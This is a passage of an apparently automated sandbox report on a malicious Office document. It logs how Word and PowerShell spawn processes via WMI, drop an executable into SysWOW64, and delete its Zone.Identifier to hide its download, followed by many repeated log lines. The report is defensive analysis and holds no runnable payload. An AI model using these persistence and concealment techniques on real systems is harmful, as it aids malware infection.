Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002777DE push ecx; mov dword ptr [esp], 00004180h 4_2_002777DF
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605E40 push ecx; mov dword ptr [esp], 00002B63h 5_2_00605E41
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605C40 push ecx; mov dword ptr [esp], 00004180h 5_2_00605C41
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605D50 push ecx; mov dword ptr [esp], 000097F2h 5_2_00605D51
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605F50 push ecx; mov dword ptr [esp], 00000282h 5_2_00605F51
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00605E10 push ecx; mov dword ptr [esp], 0000AF8Ah 5_2_00605E11

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Executable created and started: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe PE file moved: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File opened: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004035A9 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_004035A9
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office